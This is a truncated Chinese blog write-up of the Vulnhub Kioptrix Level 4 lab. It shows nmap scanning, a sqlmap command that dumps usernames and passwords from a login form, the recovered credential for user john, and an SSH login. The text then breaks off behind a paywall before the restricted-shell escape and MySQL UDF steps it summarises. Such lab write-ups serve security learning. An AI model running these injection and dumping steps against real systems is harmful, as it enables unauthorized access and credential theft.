本文详细记录了通过Vulnhub的Kioptrix Level 4靶机的渗透过程,包括信息收集、受限shell逃逸和MySQL UDF提权。首先,通过端口扫描和SQL注入获取了john用户的账号密码,然后利用限制性的shell进行逃逸。在权限提升阶段,由于缺少gcc,作者通过分析系统配置发现mysql以root权限运行,并利用MySQL UDF漏洞为john用户赋予root权限,最终成功获得root访问。
靶机:192.168.249.133
kali:192.168.249.132
一、信息收集
nmap -sV 192.168.249.133 —查看开放端口
—查看下80端口—
—是个登录框可能猜测sql注入漏洞—
—在用户名和密码处*标记,sqlmap跑一下
sqlmap -r 1.txt --level 3 -risk 2 --batch -D members -T members -C password,username --dump—爆出用户名john密码MyNameIsJohn
ssh [email protected]-----得到账号密码,先尝试ssh连接下
最低0.47元/天 解锁文章
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
